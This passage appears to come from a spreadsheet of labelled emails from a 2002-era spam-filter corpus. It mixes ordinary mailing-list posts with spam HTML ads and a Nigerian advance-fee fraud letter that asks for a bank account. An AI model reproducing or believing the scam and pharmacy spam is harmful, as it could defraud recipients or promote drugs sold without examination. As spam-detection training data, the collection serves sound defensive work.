 On Thursday, August 22, 2002, at 07:21  PM, Scott A Crosby wrote:
 &gt; On Thu, 22 Aug 2002 09:20:05 -0700, Craig R.Hughes 
 &gt; &lt;craig@deersoft.com&gt; writes:
 &gt;
 &gt;&gt; It *can* learn combinatorial stuff in a more subtle way.  Imagine
 &gt;
 &gt; No it can't..
 &gt;
 &gt; It can learn a few examples that happen to be linearily seperable,
 &gt; like those you gave. It cannot learn the example I gave below, which
 &gt; is not linearily seperable.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: AA Meetings the Hottest Place to Meet Women With Big Bucks
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy:
 &gt;OK, but only if you also meant religious and alcoholic extremes ;)
 Since it was my quip, I'll point out that I used
 the term "alcoholism," implying addiction. I
 drink. I'm not an alcoholic. Most people who drink
 don't go to AA meetings. Most people who go to AA
 meetings do (try very hard) not to drink.
 As to religion, I think it is harmful and risky in
 almost any degree. Were I single, I might consider
 potential mates who partook of the less irrational
 or more light-hearted religions. A Unitarian or
 Buddhist might be an example of the first, a Wiccan
 of the second. But someone who is both irrational
 and serious about that irrationality strikes me as
 a bad choice of partner, moreso than someone who
 was addicted to some drug. Alcoholics and drug
 addicts at least have the sense to battle their
 problem, and to keep their children from suffering
 it. The religious revel in their irrationality,
 and want to raise their children in it. That's a
 difficult difference for two parents to
 reconcile.
 Fortunately, I am long and happily enamored of
 someone who has no religious tendencies.
 _________________________________________________________________
 Send and receive Hotmail on your mobile device: http://mobile.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] RH7.3 on Cobalt - the saga continues
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;  Curiously, when I go into the boot prom, an use
 &gt; 
 &gt;  "set_params" I can tell it to mount /dev/hda2 as root. But 
 &gt; then it uses the PROM copy of the kernel (dodgy 2.2.16 
 &gt; kernel), which doesn't know ext3, so wants to fsck up my disk.
 Boot prom on a cobalt? Is this an old mips based one? How did you get to it?
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get a FREE Bottle of Wine &amp; Tasting Kit
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Classic Wines&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="1" cellpadding="0" cellspacing="0" width="500" bordercolor="#660000"&gt;
     &lt;tr&gt;
       &lt;td valign="top" align="center"&gt;
         &lt;div align="center"&gt;
           &lt;table border="0" cellpadding="0" cellspacing="0" width="500"&gt;
             &lt;tr&gt;
               &lt;td bgcolor="#EFEFDA" width="166" valign="top"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=TAMOSXHJCWJQ&amp;ext=1"&gt;&lt;img border="0" src="http://www.beertrips.com/merchant/images/logo_classic.gif" alt="Classic Wines" width="166" height="109"&gt;&lt;/a&gt;&lt;/td&gt;
               &lt;td bgcolor="#660000" width="334" valign="bottom"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=TAMOSXHJCWJQ&amp;ext=1"&gt;&lt;img border="0" src="http://www.beertrips.com/merchant/images/main1.jpg" alt="The World's Best Wines" width="334" height="109"&gt;&lt;/a&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td valign="top" bgcolor="#EFEFDA" width="166"&gt;
                 &lt;p style="margin-top: 0; margin-bottom: 0" align="center"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=TAMOSXHJCWJQ&amp;ext=1"&gt;&lt;img border="0" src="http://www.beertrips.com/merchant/images/myWineStarter4C.jpg" alt="Free Wine Kit" width="166" height="166"&gt;&lt;/a&gt;&lt;/p&gt;
                 &lt;a href="http://theadmanager.com/server/c.asp?ad_key=TAMOSXHJCWJQ&amp;ext=1"&gt;&lt;img border="0" src="http://www.beertrips.com/merchant/images/free_gift_bottle.gif" width="165" height="100"&gt;&lt;/a&gt;
                 &lt;p style="margin-top: 10; margin-bottom: 20" align="center"&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;i&gt;All of this can be&lt;br&gt;
                 Yours for only&lt;br&gt;
                 $12.99*&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;table border="0" cellpadding="0" cellspacing="0" width="100%" msimagelist&gt;
                   &lt;tr msimagelist&gt;
                     &lt;td valign="baseline" width="42" msimagelist&gt;&lt;img src="http://www.beertrips.com/merchant/images/bullet.gif" width="4" height="8" hspace="19"&gt;&lt;/td&gt;
                     &lt;td valign="top" width="100%"&gt;
                       &lt;p align="left" style="margin-left: 0; margin-right: 5"&gt;&lt;font size="2" face="Arial"&gt; 2 Bottles of Premium Wine&lt;/font&gt;&lt;/td msimagelist&gt;
                   &lt;/tr&gt;
                   &lt;tr msimagelist&gt;
                     &lt;td valign="baseline" width="42" msimagelist&gt;&lt;img src="http://www.beertrips.com/merchant/images/bullet.gif" width="4" height="8" hspace="19"&gt;&lt;/td&gt;
                     &lt;td valign="top" width="100%"&gt;
                       &lt;p align="left" style="margin-left: 0; margin-right: 5"&gt;&lt;font size="2" face="Arial"&gt; 2 Elegant Wine Glasses&lt;/font&gt;&lt;/td msimagelist&gt;
                   &lt;/tr&gt;
                   &lt;tr msimagelist&gt;
                     &lt;td valign="baseline" width="42" msimagelist&gt;&lt;img src="http://www.beertrips.com/merchant/images/bullet.gif" width="4" height="8" hspace="19"&gt;&lt;/td&gt;
                     &lt;td valign="top" width="100%"&gt;
                       &lt;p align="left" style="margin-left: 0; margin-right: 5"&gt;&lt;font size="2" face="Arial"&gt; Capitano Waiter's Corkscrew&lt;/font&gt;&lt;/td msimagelist&gt;
                   &lt;/tr&gt;
                   &lt;tr msimagelist&gt;
                     &lt;td valign="baseline" width="42" msimagelist&gt;&lt;img src="http://www.beertrips.com/merchant/images/bullet.gif" width="4" height="8" hspace="19"&gt;&lt;/td&gt;
                     &lt;td valign="top" width="100%"&gt;
                       &lt;p align="left" style="margin-left: 0; margin-right: 5"&gt;&lt;font size="2" face="Arial"&gt; Marble Bottle Stopper&lt;/font&gt;&lt;/td msimagelist&gt;
                   &lt;/tr&gt;
                   &lt;tr msimagelist&gt;
                     &lt;td valign="baseline" width="42" msimagelist&gt;&lt;img src="http://www.beertrips.com/merchant/images/bullet.gif" width="4" height="8" hspace="19"&gt;&lt;/td&gt;
                     &lt;td valign="top" width="100%"&gt;
                       &lt;p align="left" style="margin-left: 0; margin-right: 5"&gt;&lt;font size="2" face="Arial"&gt; Delicious Gourmet Wine Crackers&lt;/font&gt;&lt;/td msimagelist&gt;
                   &lt;/tr&gt;
                   &lt;tr msimagelist&gt;
                     &lt;td valign="baseline" width="42" msimagelist&gt;&lt;img src="http://www.beertrips.com/merchant/images/bullet.gif" width="4" height="8" hspace="19"&gt;&lt;/td&gt;
                     &lt;td valign="top" width="100%"&gt;
                       &lt;p align="left" style="margin-left: 0; margin-right: 5"&gt;&lt;font size="2" face="Arial"&gt; Member Discounts on Additional Wine
                       Selections&lt;/font&gt;&lt;/td msimagelist&gt;
                   &lt;/tr&gt;
                   &lt;tr msimagelist&gt;
                     &lt;td valign="baseline" width="42" msimagelist&gt;&lt;img src="http://www.beertrips.com/merchant/images/bullet.gif" width="4" height="8" hspace="19"&gt;&lt;/td&gt;
                     &lt;td valign="top" width="100%"&gt;
                       &lt;p align="left" style="margin-left: 0; margin-right: 5"&gt;&lt;font size="2" face="Arial"&gt; Our Cellar Profile newsletter&lt;/font&gt;&lt;/td msimagelist&gt;
                   &lt;/tr&gt;
                 &lt;/table msimagelist&gt;
                 &lt;p align="center"&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;i&gt;Total Retail Value of this Special Offer -
                 $42.95&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;p align="center"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=TAMOSXHJCWJQ&amp;ext=1"&gt;&lt;img border="0" src="http://www.beertrips.com/merchant/images/ordersshipped.gif" width="126" height="92"&gt;&lt;/a&gt;&lt;br&gt;
               &lt;/td&gt;
               &lt;td valign="top" align="right" bgcolor="#FFFFFF" width="334"&gt;&lt;font face="Arial"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=TAMOSXHJCWJQ&amp;ext=1"&gt;&lt;img border="0" src="http://www.beertrips.com/merchant/images/main2.jpg" width="334" height="57"&gt;&lt;/a&gt;&lt;/font&gt;&lt;p style="margin-top: 10; margin-bottom: 10" align="center"&gt;&lt;font face="Arial"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=TAMOSXHJCWJQ&amp;ext=1"&gt;&lt;img border="0" src="http://www.beertrips.com/merchant/images/taste_two_bottle.gif" width="334" height="95"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;/center&gt;&lt;p style="margin-left: 10; margin-right: 5; margin-top: 15; margin-bottom: 20" align="left"&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Arial"&gt;A
                 special offer for the discriminating&lt;br&gt;
                 wine drinker.&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;
               &lt;/p&gt;
   &lt;center&gt;
               &lt;p style="margin-left: 10; margin-right: 5; margin-top: 0" align="left"&gt;&lt;b&gt;&lt;font size="2" face="Arial"&gt;In&lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial"&gt;&lt;b&gt;dulge your love of adventure . discovery . and fine wine from the comfort of your home with our convenient program.&lt;/b&gt; Receive two expertly selected premium wines for
               the price of one - only $12.99* - 50% off the regular price - delivered to your door with our Wine Starter Kit as a FREE Gift.  Starter Kit includes, 2 Elegant Wine Glasses, a Capitano Waiter's Corkscrew, Gourmet Wine Crackers and MORE!&lt;/font&gt;&lt;/p&gt;
               &lt;p style="margin-left: 10; margin-right: 5" align="left"&gt;&lt;font size="2" face="Arial"&gt;You'll have your choice of two reds, two whites or one of each. One month you may have the pleasure of experiencing a wonderfully full-bodied Cabernet Sauvignon from California and a delicious Chardonnay from Australia. Another month, you may get an exquisite Chianti from Italy and a fabulous Sauvignon Blanc from France. You'll savor a broad range of some of the world's most fascinating wine - right in your own home.&lt;/font&gt;&lt;/p&gt;
               &lt;p style="margin-left: 10; margin-right: 5" align="left"&gt;&lt;font face="Arial"&gt;&lt;b&gt;Your satisfaction is 100% guaranteed.&lt;/b&gt; If you are not completely satisfied with the Classic Selections program, you can cancel at any time.
               &lt;b&gt; There is no minimum to buy and no obligation for further purchases or deliveries.
               &lt;/b&gt; So, uncork your own wine adventure and explore the world's finest vineyards with Classic Selections! &lt;/font&gt;
               &lt;p style="margin-top: 25" align="left"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=TAMOSXHJCWJQ&amp;ext=1"&gt;&lt;img border="0" src="http://www.beertrips.com/merchant/images/order_now.gif" width="334" height="50"&gt;&lt;/a&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;/center&gt;
           &lt;center&gt;
           &lt;tr&gt;
             &lt;td bgcolor="#660000" colspan="2" height="3"&gt;&lt;font size="1"&gt; &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="500" colspan="2"&gt;
               &lt;blockquote&gt;
                 &lt;p align="left"&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;font face="Arial" size="1" color="#666666"&gt;*Plus shipping and tax from $7.00 - $9.00 depending on destination state.&lt;br&gt;
                 &lt;br&gt;
                 We accept orders from adults at least 21 or older only. All shipments are delivered by UPS or private courier and the signature of an adult is required at the time of delivery. Offer cannot be combined with any other offer and is void where prohibited. This offer is only valid in the following states: AZ, CA, CO, CT, FL, IA, ID, IL, IN, MI, MO, NC, NE, NJ, NM, NY, OH, OR, TX, VA, WA, WI. List of legal states subject to change.&lt;br&gt;
                 Due to legal restrictions in some states, alcohol can not be given away for free.  Therefore, the promotion is 50% off of the two bottles which equates to the same as one free bottle.&lt;/font&gt;&lt;/p&gt;
               &lt;/blockquote&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
         &lt;p align="center" style="margin-top: 0; margin-bottom: 0"&gt; &lt;/center&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=TAMOSXHJCWJQ"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</si>
  <si>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Re: Sorting
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 09 Sep 2002 15:36:37 -0400 
 Tom Reingold &lt;noglider@pobox.com&gt; wrote:
 &gt; At work, I have to use Outlook.  Ick.  I hate it.  
 Ahh.  At work we fire people who use Outlook (Literally true: They get
 escorted to the door, their badge confiscated, and told to return the
 next day to collect their office contents).
 &gt; But it does a few things right.  Like making indices for each folder,
 &gt; and not just by date, but also by sender, message size, subject.  So I
 &gt; can sort by any column instantly.
 Have you looked into using a custom sequences file?
 &gt; And mime handling is pretty bad compared with modern mailers.
 The only thing I actually miss in that regard is support for S/MIME.
 -- 
 J C Lawrence                
 ---------(*)                Satan, oscillate my metallic sonatas. 
 claw@kanga.nu               He lived as a devil, eh?		  
 http://www.kanga.nu/~claw/  Evil is a name of a foeman, as I live.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] SpamAssassin POP3 proxy
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:
 &gt; Actually, I want to avoid that -- I've already removed spamproxyd
 &gt; from the distro for 2.40. Here's why:
 &gt; 
 &gt; When they're in the distro, *we* have to support them -- which is
 &gt; not necessarily a good thing when we didn't write them in the first
 &gt; place, or when the coder in question may not *want* us to maintain
 &gt; them. :(
 I would be in favor of creating new SpamAssassin CVS modules and
 Bugzilla categories for other clients (provided there is sufficient
 interest and a maintainer).
 Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SA] Nice web page templates here. Check it out!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
 I was recently browsing the internet and came accross some guys that are making really good job. 
 Here they are - www.templatestyles.com .
 Check it out. Nice designs!
 yorth sincerely,
 Mark Boen Lowen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</si>
  <si>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[zzzzteana] Re: Megalithomania UnPissup
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "Webmaster" &lt;webmaster@b...&gt; wrote:
 &gt;Right...Talking Stick!..but what the hell is "marathon/snickers, jif/cif 
 &gt;and
 &gt;calls itself 'Secret Chiefs' "
 &gt;
 &gt;DRS
 &gt;
 Rebranding: taking something and changing nothing about it except its name. 
 In the UK Marathon bars became Snickers bar, Jif cleaning fluid became Cif 
 and Talking Stick became Secret Chiefs, y'know?
 Scott
 "at once a fun fair, a petrified forest, and the great temple of Amun at 
 Karnak, itself drunk, and reeling in an eccentric earthquake"
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Version 7: Uncover the TRUTH about ANYONE!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: why is decentralization worth worrying about?
</t>
  </si>
  <si>
    <t xml:space="preserve">Why am I so passionate about decentralization? Because I believe some of 
 todays most profound problems with networked applications are caused by 
 centralization.
 Generically, a centralized political or economic system permits only one 
 answer to a question, while decentralization permits many separate 
 agents to hold different opinions of the same matter. In the specific 
 context of software, centralized variables can only contain one valid 
 value at a time. That limits us to only representing information A) 
 according to the beliefs of a single agency, and B) that changes more 
 slowly than it takes to propagate. Nevertheless, centralization is the 
 basis for todays most popular architectural style for developing 
 network applications: client-server interaction using request-response 
 communication protocols.
 I believe these are profound limitations, which we are already 
 encountering in practice. Spam, for example, is in the eye of the 
 beholder, yet our email protocols and tools do not acknowledge the 
 separate interests of senders and receivers. Slamming, for another, 
 unfairly advantages the bidder with the lowest-latency connection to a 
 centralized auction server. Sharing ad-hoc wireless networks is yet a 
 third example of decentralized resource allocation. Furthermore, as 
 abstract as centralization-induced failures might seem today, these 
 limits will _not_ improve as the cost of computing, storage, and 
 communication bandwidth continue to plummet. Instead, the speed of light 
 and human independence constitute _fundamental_ limits to centralized 
 information representation, and hence centralized software architecture.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Netscape 7 Review
</t>
  </si>
  <si>
    <t xml:space="preserve">This is my Netscape 7.0 Review.
 o They finally got the email search speed back up to
    where it was in 4.7.x
 o Setting up user mail accounts doesn't have that really
    odd, sometimes it lets me sometimes it doesn't problem that
    previous versions had.
 o I still have to manually update all my address books by
    hand but at least it lets me import them as Netscape 4.x
    address books (there's not 6.x import as they just assume
    it works--which it doesn't)
 o The mail filters are still broken and have the same problem that
    I've tried to report since 4.0.2 where you can't store a mail
    filter of the type: Age in days, is greater than, 21 (or some number)
    Gawd I'd really wish they'd fix that freakin' bug, it's the single
    biggest annoyance that I have with Netscape as it's one of the
    most effective anti-spam tools that I have.
 o Webex doesn't support Netscape 7.0 and the plugin doesn't
    work which causes problems when you want to use Webex to
    work on something with someone remotely.
 I've given up trying to report bugs and any changes to the
 source I send always get lost.
 Greg
 -- 
 Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
 gbolcer at endeavors.com  | http://endeavors.com
 Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CIA in blow to Bush attack plans
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723991,215/
 Date: 2002-10-10T03:27:00+01:00
 US invasion could push Saddam Hussein into retaliating with chemical or 
 biological weapons, warns CIA.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Seeking Your Partnership
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Partner to be,
 First, I must apologise to you for using this medium to communicate to you
 about this project.
 I am a highly placed official of  Government of Nigeria and also a
 founding member of the ruling party in Power now,the Peoples Democratic
 Party(PDP).
 My committee - The Niger Delta Development Corporation(NDDC)-which is in
 charge of managing and supervising  the disbursement of oil sales revenues
 for the Nigerian government.The revenues  under our control runs into
 several hundred of millions of dollars monthly.My self and   
 other colleagues in the NDDC are currently in need of a foreign partner
 with whose bank account we shall transfer the sum of Forty Nine Million
 Five Hundred Thosand United States Dollars($49.5m).This fund accrued to us
 as commission for oil sales contracts handled under our supervision.
 The fund is presently waiting in the Government Account named CBN/FGN
 INDEPENDENT REVENUE account number 400-939134 with J.P.MORGAN CHASE
 BANK,New York.You can do your independent verification of this. However,
 by virtue of our  position as civil servants and members of the NDDC, we
 cannot acquire this funds in our name. This is because as top civil
 servants, we are not allowed by law of the land to own or operate bank
 accounts outside our country for now.
 I have been delegated as a matter of trust by my colleagues,
 to look for an overseas partner in whose account we would
 transfer the fund
 Hence the reason for this mail.We shall be Transferring the money to your
 account with your company as we shall present your company as a registered
 Foreign company in Nigeria and you are been paid for a contract which you
 executed for our country through the NDDC and any other Federal Ministry
 that we decide to use to siphon the funds through.
 For your support and partnership,please reply me to negotiate your fees or
 the percentage you wish to be paid when the funds arrive your bank account.
 You must however note that this transaction, with
 regards to our disposition to continue with you, is subject
 to these terms. Firstly, our conviction of your transparency.
 Secondly, that you treat this transaction with utmost secrecy
 and confidentiality. Finally and above all, that you will provide
 an account that you have absolute control over.
 The transaction, although discrete, is legitimate and there
 is no risk or legal disadvantages either to ourselves or yourself now or
 in the future as we have put in place perfect mchineries that will ensure
 a hitch free transfer into your account upon acceptance.
 The transfer will be effected to your account within ten-fourteen
 (10-14) working days as soon as we reach an agreement and you furnish
 me with a  suitable bank account and company name and address with all
 your contact numbers including fax number.
 I am looking forward to doing business with you and do solicit
 your confidentiality in this transaction,  Please mail your
 response to me.
 Yours faithfully,
 Anderson K. Eseimoku
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Re: royalmeds.com To: yyyy@netnoteinc.com OfferID: qpag
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;
 RoyalMeds
 &lt;/title&gt;
 &lt;style&gt;
 &lt;!--
   .LinkBlack{Text-Decoration: none; color:#000000; font-size:8pt; font-family: arial; font-weight: normal}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font color="#636dad" face="Arial Rounded MT Bold" size="7"&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17583" style="text-decoration: none"&gt;&lt;font color="#636DAD"&gt;Royal&lt;i&gt;Meds&lt;/i&gt;&lt;/font&gt;&lt;/a&gt;&lt;i&gt;.com&lt;/i&gt;&lt;/font&gt;&lt;i&gt;&lt;a style="text-decoration: none" href="http://www.royalmeds.com/main2.php?rx=17583"&gt;&lt;font color="#636dad" face="Arial Rounded MT Bold"&gt;&lt;br&gt;
 your online pharmacy &lt;/font&gt;&lt;font color="#636dad" face="Arial"&gt;&lt;/font&gt;&lt;font color="#636dad" face="Arial Rounded MT Bold"&gt; &lt;/font&gt;&lt;/a&gt;&lt;/i&gt;&lt;font face="Tahoma" size="2"&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17583"&gt;www.royalmeds.com&lt;/a&gt;&lt;/font&gt;&lt;p&gt;&lt;font face="Tahoma" size="2"&gt;&amp;gt; We offer the Absolute Lowest prices on FDA-approved medications.&lt;/font&gt;&lt;p&gt;&lt;font face="Tahoma" size="2"&gt;&amp;gt; Medication prescribed by &lt;i&gt;&lt;b&gt;licensed U.S. Physicians&lt;/b&gt;&lt;/i&gt; and shipped via FedEx overnight delivery. &lt;/font&gt;&lt;p&gt;&lt;font face="Tahoma" size="2"&gt;&amp;gt; Free Medical Consultation Available 24 hours... 7 Days a week! &lt;/font&gt;&lt;p&gt;&lt;font face="Tahoma" size="2"&gt;&amp;gt; No Physical Exam Necessary. &lt;/font&gt;&lt;p&gt;&lt;font face="Tahoma" size="2"&gt;&amp;gt; Featured Products include:&lt;/font&gt;&lt;ul&gt;
 &lt;li&gt;&lt;font face="Tahoma" size="2"&gt;WEIGHT LOSS: &lt;b&gt;MERIDIA, PHENTERMINE &lt;/b&gt;and&lt;b&gt; XENICAL &lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Tahoma" size="2"&gt;SEXUAL: &lt;b&gt;VIAGRA &lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Tahoma" size="2"&gt;SKIN CARE: &lt;b&gt;RENOVA &lt;/b&gt;and&lt;b&gt; RETIN-A &lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Tahoma" size="2"&gt;STOP SMOKING: &lt;b&gt;ZYBAN&lt;/b&gt; &lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Tahoma" size="2"&gt;HAIR LOSS: &lt;b&gt;PROPECIA&lt;/b&gt; &lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Tahoma" size="2"&gt;HERPES: &lt;b&gt;VALTREX &lt;/b&gt;and&lt;b&gt; FAMVIR&lt;/b&gt; &lt;/font&gt;&lt;/li&gt;
 &lt;li&gt;&lt;font face="Tahoma" size="2"&gt;PAIN RELIEF: &lt;b&gt;CELEBREX &lt;/b&gt;and&lt;b&gt; CLARITIN&lt;/b&gt; &lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;font face="Arial Rounded MT Bold"&gt;&lt;b&gt;&lt;font size="4"&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17583"&gt;&lt;i&gt;Click here to see how &lt;/i&gt;Royal&lt;i&gt;Meds.com can help you&lt;/i&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;p&gt;&lt;font face="Tahoma" size="2"&gt;&lt;a href="http://www.royalmeds.com/main2.php?rx=17583"&gt;http://www.royalmeds.com&lt;/a&gt;&lt;/font&gt;&lt;p&gt;&amp;nbsp;&amp;nbsp;&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;&lt;p align="left"&gt;&lt;font face="Arial" size="2"&gt;&lt;b&gt;Unsubscribe Information:&lt;/b&gt;&lt;br&gt;
 This email is intended to be a benefit to the recipient. If you would like to opt-out and not receive any more marketing information please &lt;a href="http://worldrxco.com/remove.php" target="_blank"&gt;click here&lt;/a&gt; . Your address will be removed within 24hrs. We sincerely apologize for any inconvenience.&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 jiocdhkevgjeftbjegpaerthqftuuiofljey
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are bigger notebooks better?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Hardware Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;&lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;&lt;td width=442 colspan=4&gt;
     	&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hw/442_computersHEAD_NWSLTR.gif" width="442" height="60" border="0" alt="CNET Computers.com Newsletter"&gt;&lt;br&gt;
         &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
         	&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
             &lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img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 shopping  --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4my9wiMiZxrhBm0WHthZR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Gateway.160x600_300c_0502.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /shopping --&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zGNpQVcu8ZvQIzTKtR1dR" &gt;Samsung ML-1430&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAh2gJfIuNyGEI9rCM8vcR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmE_4HIO_7DQESNPe-iRR" &gt;Unitech 2U4U DMR-300&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6Z4KKXARjHpx8lOheMnlR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
